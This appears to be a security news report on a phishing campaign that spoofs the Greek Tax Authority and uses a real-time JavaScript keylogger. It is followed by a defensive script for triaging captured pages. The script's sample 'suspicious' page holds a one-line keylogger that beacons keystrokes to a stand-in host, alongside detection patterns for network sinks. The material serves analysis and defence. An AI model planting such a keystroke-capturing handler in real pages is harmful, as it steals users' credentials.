Phishing Pages Now Embedding Keyloggers to Steal Data

Security analysts at Cyble have identified a notable phishing campaign targeting users in Greece. The operators behind this scam run phishing websites that mimic the official site of the Greek Tax Authority. These sites contain a keylogger that steals login credentials and other information as soon as it is entered.

How the Attack Works

The attack begins with standard phishing emails, where the scammers pose as the Greek Tax Authority and inform the recipient of some good news: supposedly, after a recalculation, they are owed a tax refund of €634.13. The email claims that the funds could not be automatically transferred to the recipient’s bank account due to unspecified issues.

As a result, the user is asked to visit the tax authority’s website and complete the verification process themselves. The emails contain links leading to several phishing sites designed to look like the official Greek Tax Authority website (such as govgr-tax[.]me/ret/tax, govgreece-tax[.]me, and mygov-refund[.]me/ret/tax).

Phishing Site Tactics

On the fake site, visitors are asked to select the bank where the funds should be sent. Victims are given seven options, including several major Greek banks. Depending on the bank selected, the user is redirected to another fake site. The login page is then styled to match the chosen financial institution.

When the victim begins entering their login credentials into the provided form, a JavaScript keylogger embedded on the page captures every keystroke and sends the data to the attackers.

Real-Time Data Theft

This method allows cybercriminals to access information in real time. Worse yet, even if the user changes their mind at the last moment and does not click the “Submit” button, it no longer matters—the information is compromised instantly, as it is being typed.

Researchers note that it is extremely rare for phishers to use real-time keylogging, and this attack targeting Greeks may signal the emergence of a new and highly dangerous trend among hackers. This approach can significantly increase the chances of successfully stealing credentials, and the JavaScript keylogger will load and operate even if the victim’s browser is set to block third-party trackers.
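For analysts triaging a captured page, the behaviour described above (a network call made from inside a keystroke handler rather than on form submit) can be checked statically. The following is an added example, not code from the Cyble report or the campaign; the function names, the sink list and both sample pages are assumptions constructed for illustration.

```javascript
// Added example: static triage of a captured page. Heuristic only; it reads inline
// scripts and does not fetch external ones or follow handlers passed by name.
const KEY_EVENT = /addEventListener\s*\(\s*["'`](?:keydown|keyup|keypress|input)["'`]|\bon(?:keydown|keyup|keypress|input)\s*=/;
const SINKS = {
  fetch: /\bfetch\s*\(/,
  XMLHttpRequest: /\bnew\s+XMLHttpRequest\b/,
  sendBeacon: /\.sendBeacon\s*\(/,
  WebSocket: /\bnew\s+WebSocket\b/,
  imageBeacon: /\bnew\s+Image\b[\s\S]*?\.src\s*=/,
};

// Return the text of every inline <script> (those without a src attribute).
function inlineScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  return [...html.matchAll(re)].filter((m) => !/\bsrc\s*=/i.test(m[1])).map((m) => m[2]);
}

// Return the brace-delimited body that follows each keystroke-handler registration.
function handlerBodies(code) {
  const bodies = [];
  for (const m of code.matchAll(new RegExp(KEY_EVENT.source, "g"))) {
    const start = code.indexOf("{", m.index);
    if (start === -1) continue;
    let depth = 0, end = start;
    for (; end < code.length; end++) {
      if (code[end] === "{") depth++;
      else if (code[end] === "}" && --depth === 0) break;
    }
    bodies.push(code.slice(start, end + 1));
  }
  return bodies;
}

// Flag scripts whose keystroke handler itself makes a network call.
function triagePage(html) {
  const findings = [];
  inlineScripts(html).forEach((code, script) => {
    for (const body of handlerBodies(code)) {
      const sinks = Object.keys(SINKS).filter((name) => SINKS[name].test(body));
      if (sinks.length) findings.push({ script, sinks });
    }
  });
  return findings;
}

// Constructed sample pages (not taken from the campaign).
const BENIGN = `<form id="f"><input name="u"></form><script>
const f = document.getElementById("f");
f.addEventListener("keydown", function (e) { f.dataset.caps = e.getModifierState("CapsLock"); });
f.addEventListener("submit", function () { fetch("/login", { method: "POST", body: new FormData(f) }); });
</script>`;
const SUSPICIOUS = `<input name="u"><script>
document.addEventListener("keyup", function (e) { navigator.sendBeacon("https://collector.example/k", e.key); });
</script>`;
console.log(triagePage(BENIGN), triagePage(SUSPICIOUS));
```

A hit is a lead for manual review, not a verdict: some legitimate pages send requests from input handlers (search suggestions, for example), and obfuscated or externally loaded scripts will not match.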
